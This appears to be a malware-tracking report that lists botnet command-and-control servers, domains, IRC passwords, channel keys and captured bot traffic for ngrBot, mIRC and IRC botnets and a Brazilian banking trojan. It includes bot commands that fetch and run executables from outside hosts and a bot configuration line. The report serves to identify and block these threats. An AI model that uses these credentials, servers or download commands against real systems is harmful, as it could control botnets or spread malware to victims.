This malware spreads through email and executable infection, injects into explorer.exe, downloads other malware, and is controlled over HTTP:
sec.ka3ek2.com DNS_TYPE_A 31.44.184.232
Infected SMTP servers used by this malware for spamming:
Resolved : [mx3.hotmail.com] To [65.54.188.72]
Resolved : [mx3.hotmail.com] To [65.54.188.94]
Resolved : [mx3.hotmail.com] To [65.55.92.152]
Resolved : [mx3.hotmail.com] To [65.55.37.120]
Resolved : [mx3.hotmail.com] To [65.55.37.104]
Resolved : [mx3.hotmail.com]
67.222.146.210 (ngrBot hosted in United States, Dfw Datacenter)
Remote Host      Port Number
199.15.234.7     80
67.222.146.210   6060
PASS saher
NICK n{US|XPa}exohsgb
USER exohsgb 0 0 :exohsgb
JOIN #ksa ksa1
Hosting info: http://whois.domaintools.com/67.222.146.210
mooo.com (ngrBot hosted in Ukraine, Poltava, Tehnologii Budushego Llc)
Domain names used to control the botnet:
hdp.zapto.org    46.166.141.149   active
1n1.sytes.net    213.155.7.39     active
hdp.zapto.org                     not active
hgjma1.biz                        not active
jma1.biz                          not active
mooo.com         72.8.150.1       active
n1.mooo.com      86.35.19.116     active
fhdp.zapto.org
Remote Host      Port Number
199.15.234.7     80
50.22.107.93     80
213.155.7.39     2009
PASS ngr
NICK n{US|XPa}dcbcoox
USER dcbcoox 0 0 :dcbcoox
JOIN #juaz ngrBot
PRIVMSG #juaz :[d="http://creatucurso.net/facu/mx.exe" s="198683
216.246.78.247 (IRC bot hosted in United States, New York, Hostforweb Inc)
Remote Host      Port Number
216.246.78.247   2345
NICK New[USA|00|P|75060]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-9002 * 0 :COMPUTERNAME
MODE New[USA|00|P|75060] -ix
JOIN #!loco!
PONG 22
MOTD
Hosting info: http://whois.domaintools.com/216.246.78.247
tool.manitam.com (mIRC bots hosted in United Kingdom, Redstation Limited)
tool.manitam.com 176.227.199.27
dslb-088-065-091-000.pools.arcor-ip.net 88.65.91.0
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
C&C Server: 176.227.199.27:6669
Server Password:
Username: m0x
Nickname: [x0x]XP92288
Channel: #d0x (Password: )
Channeltopic:
Bot Config:
On *:start: { .Nickler .server tool.manitam.com 6669 .timer 0 0 BoTNeT .dll dmu.dll HideMirc
mysticalisboss.info (2k ngrBots hosted in Netherlands, Amsterdam, Ecatel Ltd)
The noob behind this net is a very big HF hecker named Mystical.
Remote Host      Port Number
199.15.234.7     80
80.82.66.220     6667
Local users: Current Local Users: 1199 Max: 2019
Global users: Current Global Users: 1199 Max: 2019
PONG :B070CCDD
JOIN #Techno
PONG :Unreal.ircd
NICK n{US|XP-32a}ffmidty
USER ffmidty 0 * :ffmidty
Other channels: #gBot 8 [+sntu]
pandafix.com.br (Banking Trojan hosted in Brazil, Caxias Do Sul, Comite Gestor Da Internet No Brasil)
This malware injects into notepad.exe.
notepad.exe - Network Activity
DNS Queries:
dl.dropbox.com DNS_TYPE_A 50.16.240.166 107.20.132.92 107.20.134.231 107.20.135.122 107.20.207.68 174.129.232.94 184.73.245.80 23.21.195.136
www.comeciosilvaa.com.br DNS_TYPE_A 200.98.197.80 YES udp
www.pandafix.com.br DNS_TYPE_A 187.17.98.44 YES udp
HTTP Conversations:
50.16.240.166:80 - [dl.dropbox.com] Request: GET /u/56787160/index.html Response: 200 "OK"
200.98.197.80:80 - [www.comeciosilvaa.com.br] Request: POST /avisosgordim/index.php Response: 404 "Not Found"
187.17.98.44:80
199.19.105.67 (ngrBot hosted in United States, Clarks Summit, Volumedrive)
Remote Host      Port Number
199.15.234.7     80
200.121.52.63    80
199.19.105.67    1085
PASS mypass
NICK n{US|XPa}wwphlrx
USER wwphlrx 0 0 :wwphlrx
JOIN #boss secret
PRIVMSG #boss :[DNS]: Blocked 0 domain(s) - Redirected 6 domain(s)
[#boss] [ Topic: !up http://www.bairesac.com/exploradore.exe 190416f04cfb5877642f69b8f59708dd ]
Hosting info: http://whois.domaintools.com/199.19.105.67
46.166.140.140 (ngrBot hosted in United States, Amsterdam, Santrex Internet Services Ltd)
Remote Host      Port Number
199.15.234.7     80
46.166.140.140   6667
PASS secret
Clients: I have 111 clients and 0 servers
Local users: Current Local Users: 111 Max: 205
Global users: Current Global Users: 111 Max: 205
NICK n{US|XPa}mthtknh
USER mthtknh 0 0 :mthtknh
JOIN #bone peruch
Now talking in #bone
Joins: {ESP|XPa}tyxdvpo [tyxdvpo@594ABF0E.765DC855.6CB32CB6.IP]
Joins: {PE|W7u}ldbnzwu 12[15ldbnzwu@22B3CEAE.9F16B729.F84BD3C2.IP]
hosting
108.163.164.154 (IRC botnet hosted in Canada, Verdun, Iweb Technologies Inc)
Remote Host      Port Number
108.163.164.154  1863
MODE {XPUSA706826} -ix
PRIVMSG #per1 : 14,1. 15:: 11iMBot 9[Actualizacion] Iniciando descarga: 63.5KB a: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_02130.exe @ 31.8KB/sec.
QUIT 3,1 Actualizando al nuevo binario
NICK {XPUSA48968}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA48968} -ix
JOIN #per
JOIN #per1
Hosting info: http://whois.domaintools.com/108.163.164.154